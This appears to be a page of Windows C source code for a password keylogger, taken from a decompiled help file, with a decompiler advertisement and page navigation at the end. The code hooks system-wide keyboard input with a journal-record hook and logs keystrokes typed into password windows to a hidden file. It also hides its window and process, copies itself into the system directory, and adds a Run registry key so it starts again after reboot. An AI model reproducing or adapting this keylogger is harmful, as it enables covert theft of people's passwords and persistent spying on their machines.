|
void WINAPI WritePassFile(int nKey)
{
HANDLE hFile;
DWORD dwBytesWrite=1;
TCHAR lpStr,szTemp[MAX_PATH];
hFile=CreateFile("C:\\passdata.txt",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_HIDDEN,
NULL
);
SetFilePointer(hFile,0,NULL,FILE_END);
lpStr=GetKey(LOBYTE(nKey));
WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
CloseHandle(hFile);
}
void WINAPI InstallHook(HINSTANCE hInstance)
{
if(hHook==NULL)
hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0);
}
void WINAPI UninstallHook()
{
if(hHook!=NULL)
UnhookWindowsHookEx(hHook);
}
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam)
{
EVENTMSG *pMess=(EVENTMSG *)lParam;
POINT pt;
switch(pMess->message)
{
case WM_KEYDOWN:
if(IsPassWindow())
WritePassFile(LOBYTE(pMess->paramL));
break;
case WM_LBUTTONDBLCLK:
GetCursorPos(&pt);
break;
}
return CallNextHookEx(hHook,nCode,wParam,lParam);
}
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne");
if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError()){
ExitProcess(1);
}
static char szAppName[] = "jiajia" ;
HWND hwnd ;
MSG msg ;
WNDCLASSEX wndclass ;
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
wndclass.cbSize = sizeof (wndclass) ;
wndclass.style = CS_HREDRAW | CS_VREDRAW ;
wndclass.lpfnWndProc = WndProc ;
wndclass.cbClsExtra = 0 ;
wndclass.cbWndExtra = 0 ;
wndclass.hInstance = hInstance ;
wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ;
wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ;
wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
wndclass.lpszMenuName = NULL ;
wndclass.lpszClassName = szAppName ;
wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ;
RegisterClassEx(&wndclass);
hwnd=CreateWindow( szAppName, "jia jia",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT,
NULL, NULL, hInstance, NULL
);
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
HideProc(SERVICE_PROC);
InstallHook(hInstance);
GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
CopyFile(szFileName,szSysDir,FALSE);
lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
lResult=RegCreateKeyEx( HKEY_LOCAL_MACHINE,
szKey,
0,
NULL,
REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&disp
);
if(lResult==ERROR_SUCCESS)
{
lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}
while (GetMessage (&msg, NULL, 0, 0))
{
TranslateMessage (&msg) ;
DispatchMessage (&msg) ;
}
return msg.wParam ;
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
switch (iMsg)
{
case WM_PAINT:
return 0 ;
case WM_DESTROY:
UninstallHook();
PostQuitMessage (0) ;
return 0 ;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
This file is decompiled by an unregistered version of ChmDecompiler.
Regsitered version does not show this message.
You can download ChmDecompiler at : http://www.zipghost.com/ 上一页 [1] [2] |
